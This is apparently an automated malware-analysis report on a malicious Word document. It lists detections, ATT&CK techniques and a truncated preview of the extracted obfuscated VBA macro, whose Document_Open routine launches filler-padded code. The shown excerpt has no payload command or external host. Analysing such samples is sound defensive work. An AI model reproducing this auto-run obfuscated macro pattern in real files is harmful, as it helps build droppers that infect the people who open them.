MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that triggers obfuscated code. Critical heuristics indicate the use of Shell() calls, strongly suggesting the execution of arbitrary commands or the download of additional payloads. The obfuscated nature of the VBA script prevents a detailed analysis of its exact actions, but its presence and the Shell() call are indicative of a downloader or dropper.
Heuristics 5
-
ClamAV: Doc.Macro.Obfuscation-6332451-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 112416 bytes |
SHA-256: 6b9a9bc570a615424153b0a968bca8c4e103ea7939ef2bc8875dcdd979a95a52 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim KUI6FSl
KUI6FSl = Abs(40)
Dim STEsUCt, qzRF4vgf
STEsUCt = 1.3
qzRF4vgf = 1 / Cos(STEsUCt)
Dim ly2EX9, Qp2uQ
ly2EX9 = Array("hBt1w9Ul", "AIN8pQs")
Qp2uQ = ly2EX9(1)
Dim OEJxsoLwF, ms1ULmC
OEJxsoLwF = Array("f2RYgnO1", "xyLzTM8r", "nZyMn")
ms1ULmC = OEJxsoLwF(2)
Dim UNLdfm8, XlSG6CHI
UNLdfm8 = Array("Kxyv19d6i", "Cj2de")
XlSG6CHI = UNLdfm8(0)
Dim X2Qr6fa, XlPy5uV
X2Qr6fa = Array("vxw0DAs", "D9g1d", "IYDQSO8J")
XlPy5uV = X2Qr6fa(2)
Dim aNuWS, on7vNa
aNuWS = Array("EJRaW8x0u", "q4une")
on7vNa = aNuWS(0)
Dim y7c54ir, f0U8LEF5
y7c54ir = Array("hybDOCst")
f0U8LEF5 = y7c54ir(0)
Dim Rs74bCA
Rs74bCA = 4 * Atn(1)
tyg4SEu = 600 + 28
If tyg4SEu > -1368 + 1384 Then
r
End If
End Sub
Sub Document_Close()
Dim grzHo, ZgGWqL7UK
grzHo = Array("sU1pqbT", "dIeRnol", "ceYmr7LgW")
ZgGWqL7UK = grzHo(0)
Dim CBCczOYZ, O7NaTX5
CBCczOYZ = Array("MDKUkHy")
O7NaTX5 = CBCczOYZ(0)
Dim CJz2LuR, rAENWhMgG
CJz2LuR = Array("L4wLO")
rAENWhMgG = CJz2LuR(0)
Dim E8tV1, RDnHUYFK0
E8tV1 = Array("marI1x7s", "FfdR9v")
RDnHUYFK0 = E8tV1(0)
Dim g9H5plDn
g9H5plDn = Abs(92)
Dim UQTXVSp
UQTXVSp = 4 * Atn(1)
Dim YAgCx
YAgCx = 4 * Atn(1)
End Sub
Attribute VB_Name = "hvPuz2b"
Sub r()
Dim GTwa76P, Wnm92
GTwa76P = 1.3
Wnm92 = 1 / Cos(GTwa76P)
Dim yS6F0
yS6F0 = Abs(52)
Dim qepsU, G7gUb
qepsU = Array("R1vyC6O", "Gd2TZMybS")
G7gUb = qepsU(0)
Dim f2FiNZxl, ezO52r
f2FiNZxl = 1.3
ezO52r = 1 / Cos(f2FiNZxl)
Dim v0rLDFZG4, ywxkK
v0rLDFZG4 = 1.3
ywxkK = 1 / Cos(v0rLDFZG4)
Dim YGM7l0, U5UTiCSp
YGM7l0 = 1.3
U5UTiCSp = 1 / Cos(YGM7l0)
Dim ALfAP, qJr6HI4cD
ALfAP = Array("cWY5s", "Xo6CbB", "V2rZ1")
qJr6HI4cD = ALfAP(0)
Dim MShHW6, t8t4R
MShHW6 = Array("hQkMebfI0", "uoFIsw")
t8t4R = MShHW6(1)
Dim AMOuZ52
AMOuZ52 = Abs(56)
Dim tQEwIb, OmrE2
tQEwIb = 1.3
OmrE2 = 1 / Cos(tQEwIb)
Dim d8guMlU, Nq4bSBR
d8guMlU = Array("XJfR5X")
Nq4bSBR = d8guMlU(0)
Dim pslKrhi1k, NXHVD9B
pslKrhi1k = Array("SHhLX2Az", "ZVYG6p")
NXHVD9B = pslKrhi1k(1)
Dim uqQEP
uqQEP = Abs(73)
Dim gMtDFoie
gMtDFoie = 4 * Atn(1)
Dim hiYAxog, Sf6HP
hiYAxog = Array("X0emxXD", "ALlwQ9", "dh1kIz3W")
Sf6HP = hiYAxog(0)
Dim yj3GDv6M, tn0eNUt
yj3GDv6M = Array("rxt0Di6")
tn0eNUt = yj3GDv6M(0)
Dim DcQyOgk
DcQyOgk = Abs(55)
Dim CxuC2tDe, tqtgRwI8z
CxuC2tDe = 1.3
tqtgRwI8z = 1 / Cos(CxuC2tDe)
Dim MjQ4ek5O
MjQ4ek5O = 4 * Atn(1)
Dim jxpJ6CG, J3dKhP6
jxpJ6CG = Array("nxQZcXOoL")
J3dKhP6 = jxpJ6CG(0)
Dim x2jzLY, jJtHxfNgB
x2jzLY = Array("jf2Rs0gJl", "oCGjV2")
jJtHxfNgB = x2jzLY(0)
Dim NSFp8, fCEfVdy
NSFp8 = Array("stoxHjpk7")
fCEfVdy = NSFp8(0)
Dim b0YscGkUt
b0YscGkUt = 4 * Atn(1)
Dim oITcCQbV7, jeTn1
oITcCQbV7 = Array("E6eYL5kl", "GJOLxMc", "STfpZLbr")
jeTn1 = oITcCQbV7(0)
Dim GLsBbKloI
GLsBbKloI = 4 * Atn(1)
Dim jkfDwy, o8dVE0
jkfDwy = Array("xjYgVP", "knOHk7RX", "TOVDhcUX")
o8dVE0 = jkfDwy(0)
Dim R7bUzK
R7bUzK = 4 * Atn(1)
Dim R4qR2NxZ, ThDKAa
R4qR2NxZ = Array("d9Js1G", "dCQPzW", "FdO3ys8ie")
ThDKAa = R4qR2NxZ(0)
Dim fvblZeiX, lTFjxbv
fvblZeiX = Array("fvweBdAmT", "eDcG3r")
lTFjxbv = fvblZeiX(1)
Dim aOUgI, AzZgw0fT4
aOUgI = Array("XoqO43m", "o893BTu", "ZxJaLtO")
AzZgw0fT4 = aOUgI(0)
Dim oYIev, alXqmQ9
oYIev = Array("XBw7qmtA3")
alXqmQ9 = oYIev(0)
Dim qST6xw4
qST6xw4 = 4 * Atn(1)
Dim ogD8GQ7, wLCsEj1a
ogD8GQ7 = Array("scbzV9XhA")
wLCsEj1a = ogD8GQ7(0)
Dim SvRwkBJS9, pgBvoM
SvRwkBJS9 = 1.3
pgBvoM = 1 / Cos(SvRwkBJS9)
Dim F8aNA45E
F8aNA45E = Abs(52)
Dim z3Sk0dxpL, AslcIZ
z3Sk0dxpL = Array("rBI4GtHJ0")
AslcIZ = z3Sk0dxpL(0)
Dim WkdYwD2, toBVsCe
WkdYwD2 = 1.3
toBVsCe = 1 / Cos(WkdYwD2)
Dim jmkQfDI9, St801C3ke
jmkQfDI9 = Array("wtD5PLf", "oem7jz9")
St801C3ke = jmkQfDI9(1)
Dim SzisCWvI, g1nWc
SzisCWvI = Array("do1LCOJN", "PUsxPBX7", "hry4J")
g1nWc = SzisCWvI(2)
Dim aNqwp2UGH, vySrYp
aNqw
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.